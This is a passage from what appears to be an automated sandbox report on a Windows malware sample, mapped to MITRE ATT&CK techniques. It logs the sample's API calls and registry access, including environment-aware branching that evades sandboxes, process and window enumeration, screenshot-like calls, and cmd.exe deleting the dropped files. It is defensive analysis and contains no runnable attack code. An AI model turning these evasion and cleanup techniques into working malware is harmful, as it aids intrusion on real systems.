1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001101f83b0000ff07000000000a01000000007f070000c4000a01302f0a01c522000094b8120067e5c37700000a01b82911000000000000000a0100000000b8291101000000007122005380000000602c1101c4000a01a05a1001003b000000000a0100000000b82911018010000000000a01b0261101f83b0000ff07000000000a01000000007f070000c4000a017b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036007c1c2af124b912006d820076bc23110104010000 (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001101f83b0000ff07000000000a01000000007f070000c4000a01302f0a019f22000094b8120067e5c37700000a01e82a11000000000000000a0100000000e82a1101000000004b22006980000000902d1101c4000a01a05a1001003b000000000a0100000000e82a11018010000000000a01e0271101f83b0000ff07000000000a01000000007f070000c4000a017b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036007c1c2af124b912006d820076e424110104010000 (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001101f83b0000ff07000000000a01000000007f070000c4000a01302f0a017a22000094b8120067e5c37700000a01102c11000000000000000a0100000000102c1101000000002622000480000000b82e1101c4000a01385a1001003b000000000a0100000000102c11018010000000000a0108291101f83b0000ff07000000000a01000000007f070000c4000a017b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036007c1c2af124b912006d8200761c26110104010000 (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000110164c21200b3446a69050000000000000000000000000000000000000000000000000000009c0100000000000000000000000000007cc9120009953af120c7120020c712005ecb33769c01000000000000005d31767cc912000e5d317614c51200dcaa3576010000000000000072000000ffffffffffffffff9cc212007802000000000000250000009cc212007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600ac672af1f4c212006d8200768c43110104010000 (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000ffff210091002b000000620b337600000000606f0a010000000050000000d445110102000000e8170d01000000000100000840a6100188730a01380b337628c1120002000000dcc112003f08377702000000e8170d01000000000100001888fb3677ccc11200c81c3576a2c3120095fb367700c31200e8170d0100000000000000000000000088c2120000000a017b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360050672af148c212006d8200768c43110104010000 (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600381e2af160bb12006d820076ac48110104010000 (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ff2bc677f8fed3772ccc1200cc010a0100000a0100000000000000000f007301480300000000000000000000000000001800000010006a0148030000e8dc1100cccb120090cb1200000000008e000000e0cb1200feffffff68cb1200cf00c777d600c777f0fed3778e00000047000000e0cb1200000000003ccb120095e1c277 (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000a01e8d91101000000003e00003e340000c010dc110178021201b86a1101f001000000000a0104000000e8d911018ccd12000464c67738010a01e063c67714f8d3770000000000000a01f0d911016dd1367719bd5df16caef0760000000000000000d8be697778021201302f0a010100000000000a0150010a010c000000f0d91101302f0a010200000218000000ae290087820000000000000000000000030000002ccd1200820000007f07000000000000ae29008702000000c0753e777802120100000000c0753e7748cd120040300a0100000000302f0a01a0cd1200ff2bc677 (UID: 00000000-00005920)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"bauqs.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"xyzuqi.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"muniw.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005920)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetForegroundWindow\" (UID: 00000000-00005920)\n \"bauqs.exe\" called \"GetForegroundWindow\" (UID: 00000000-00005756)\n \"xyzuqi.exe\" called \"GetForegroundWindow\" (UID: 00000000-00004108)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-149", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve default language settings", "description": "\"muniw.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00001844)", "origin": "API Call", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-55", "type": 3, "relevance": 10, "name": "Reads the registry for installed applications", "description": "\"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\BAUQS.EXE\")\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\BAUQS.EXE\")\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\_VSLITE.BAT\")\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\_VSLITE.BAT\")\n \"bauqs.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\XYZUQI.EXE\")\n \"bauqs.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\XYZUQI.EXE\")\n \"xyzuqi.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\MUNIW.EXE\")\n \"xyzuqi.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\MUNIW.EXE\")\n \"xyzuqi.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\_VSLITE.BAT\")\n \"xyzuqi.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\_VSLITE.BAT\")", "origin": "Registry Access", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-152", "type": 6, "relevance": 3, "name": "Calls an API typically used to enumerate active windows", "description": "\"muniw.exe\" called \"EnumWindows\" with parameter \"1241160\" - (UID: 00000000-00001844)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-130", "type": 3, "relevance": 1, "name": "Queries TCP/IP interface details", "description": "\"xyzuqi.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"ENABLEDHCP\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-147", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve local language", "description": "\"bauqs.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005756)\n \"cmd.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005740)\n \"xyzuqi.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00004108)\n \"muniw.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00001844)", "origin": "API Call", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-151", "type": 6, "relevance": 3, "name": "Calls an API typically used to get active windows title", "description": "\"muniw.exe\" called \"GetWindowTextW\" (UID: 00000000-00001844)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-144", "type": 6, "relevance": 3, "name": "Calls an API typically used to open an existing named mutex object", "description": "\"muniw.exe\" called \"OpenMutexW\" with parameter \"Local\\MSCTF.Asm.MutexDefault1\" - (UID: 00000000-00001844)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-138", "type": 3, "relevance": 1, "name": "Queries for Borland Delphi related registry entry", "description": "\"muniw.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\BORLAND\\DELPHI\\LOCALES\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "stream-39", "type": 1, "relevance": 10, "name": "Makes a code branch decision directly after an API that is environment aware", "description": "Found API call GetVersion@KERNEL32.DLL directly followed by \"cmp edx, 05h\" and \"jne 0040A183h\" at 00000000-00001844-29359-1095-0040A164\n Found API call GetTimeZoneInformation@KERNEL32.DLL directly followed by \"cmp eax, 02h\" and \"jne 00518D4Ah\" at 00000000-00001844-30502-1993-00518D34\n Found API call GetKeyboardLayout@USER32.DLL directly followed by \"cmp ebx, dword ptr [00551F18h]\" and \"je 0048C53Eh\" at 00000000-00001844-30502-6418-0048C510\n Found API call GetVersion@KERNEL32.DLL directly followed by \"cmp byte ptr [00556B58h], 00h\" and \"je 00408AF6h\" at 00000000-00001844-30502-1099-00408A78\n Found API call GetVersion@KERNEL32.DLL directly followed by \"cmp al, 04h\" and \"jc 0048783Ch\" at 00000000-00001844-30502-6362-0048761C", "origin": "Hybrid Analysis Technology", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"bauqs.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"xyzuqi.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"bauqs.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"cmd.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"xyzuqi.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"muniw.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"2\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"FindFirstFileW\" with parameter %TEMP%\\*.* (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"FindNextFileW\" with parameter 10D5CC3F-71C4-40D7-8173-E990C25C1412.Diagnose.Admin.0.etl (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"FindNextFileW\" with parameter 1df892bc-2ec3-4d0e-ac47-1eabbc40bce1.tmp (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"FindNextFileW\" with parameter 8578e504-fb9e-4973-8218-da2b499cb57d.tmp (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"FindNextFileW\" with parameter 99F9947D-30DB-4640-92C7-6BB2A24B05F1.Diagnose.Admin.0.etl (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"FindNextFileW\" with parameter a881a3c9-dc11-47c4-9cf5-94257bfac790.tmp (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"FindNextFileW\" with parameter AA7D7BE8-CE8F-4570-A39C-1992F0466AAE.Diagnose.Admin.0.etl (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"FindNextFileW\" with parameter AdobeARM.log (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"FindNextFileW\" with parameter AdobeARM_NotLocked.log (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"FindNextFileW\" with parameter AdobeSFX.log (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"FindNextFileW\" with parameter Adobe_ADMLogs (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"FindNextFileW\" with parameter ASPNETSetup_00001.log (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"FindNextFileW\" with parameter ASPNETSetup_00002.log (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"FindNextFileW\" with parameter bauqs.exe (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"FindNextFileW\" with parameter c278146c-ed5a-46a3-b7ee-8da417122e54.tmp (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"FindNextFileW\" with parameter ccversion.tag (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"FindNextFileW\" with parameter chromesetup.msi (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"FindNextFileW\" with parameter chrome_installer.log (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"FindNextFileW\" with parameter CVR640E.tmp.cvr (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"FindNextFileW\" with parameter CVR78E9.tmp.cvr (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"FindNextFileW\" with parameter CVRC166.tmp.cvr (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"FindNextFileW\" with parameter CVRE8FB.tmp.cvr (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"FindNextFileW\" with parameter dat17FA.tmp (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"FindNextFileW\" with parameter dat17FB.tmp (UID: 00000000-00005920)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-105", "type": 6, "relevance": 3, "name": "Calls an API possibly used to take screenshots", "description": "\"muniw.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"251725773\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"muniw.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"201394100\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"muniw.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"251725773\"\n \"cx\": \"0\"\n \"cy\": \"21\"}\n \"muniw.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"201394100\"\n \"cx\": \"320\"\n \"cy\": \"30\"}\n \"muniw.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"251725773\"\n \"cx\": \"132\"\n \"cy\": \"30\"}\n \"muniw.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"218171328\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"muniw.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"218171328\"\n \"cx\": \"132\"\n \"cy\": \"30\"}", "origin": "API Call", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "binary-71", "type": 8, "relevance": 1, "name": "Sample file has high entropy (likely encrypted/compressed content)", "description": "Sample file \"sample.bin\" has high entropy 7.960475373436951", "origin": "Binary File", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" opened \"\\Device\\KsecDD\"\n \"bauqs.exe\" opened \"\\Device\\KsecDD\"\n \"xyzuqi.exe\" opened \"\\Device\\KsecDD\"\n \"muniw.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"LDAPCLIENTINTEGRITY\"; Value: \"\")\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEOLDHOSTRESOLUTIONORDER\"; Value: \"\")\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEHOSTNAMEASALIAS\"; Value: \"\")\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"IPV4LOOPBACKALTERNATIVE\"; Value: \"\")\n \"bauqs.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"LDAPCLIENTINTEGRITY\"; Value: \"\")\n \"bauqs.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEOLDHOSTRESOLUTIONORDER\"; Value: \"\")\n \"bauqs.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEHOSTNAMEASALIAS\"; Value: \"\")\n \"bauqs.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"IPV4LOOPBACKALTERNATIVE\"; Value: \"\")\n \"xyzuqi.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"WINSOCK_REGISTRY_VERSION\"; Value: \"\")\n \"xyzuqi.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"NAMESPACE_CALLOUT\"; Value: \"\")\n \"xyzuqi.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"SERIAL_ACCESS_NUM\"; Value: \"\")\n \"xyzuqi.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NEXT_CATALOG_ENTRY_ID\"; Value: \"\")\n \"xyzuqi.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NUM_CATALOG_ENTRIES\"; Value: \"\")\n \"xyzuqi.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000001\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"xyzuqi.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000002\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"xyzuqi.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000003\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"xyzuqi.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000004\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"xyzuqi.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000005\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-67", "type": 3, "relevance": 10, "name": "Creates or modifies windows services", "description": "\"xyzuqi.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\")", "origin": "Registry Access", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level_human": "informative", "category": "System Destruction", "identifier": "api-26", "type": 6, "relevance": 10, "name": "Marks file for deletion", "description": "\"cmd.exe\" marked \"C:\\22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" for deletion\n \"cmd.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\_vslite.bat\" for deletion\n \"cmd.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\xyzuqi.exe\" for deletion", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level_human": "informative", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"cmd.exe\" opened \"C:\\22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" with delete access\n \"cmd.exe\" opened \"C:\\\" with delete access\n \"cmd.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\_vslite.bat\" with delete access\n \"cmd.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\xyzuqi.exe\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "api-6", "type": 6, "relevance": 4, "name": "Reads configuration files (.ini files)", "description": "\"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" reads file \"C:\\Users\\%OSUSER%\\Desktop\\desktop.ini\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" reads file \"C:\\Users\\%OSUSER%\\Searches\\desktop.ini\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" reads file \"C:\\Users\\%OSUSER%\\Videos\\desktop.ini\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" reads file 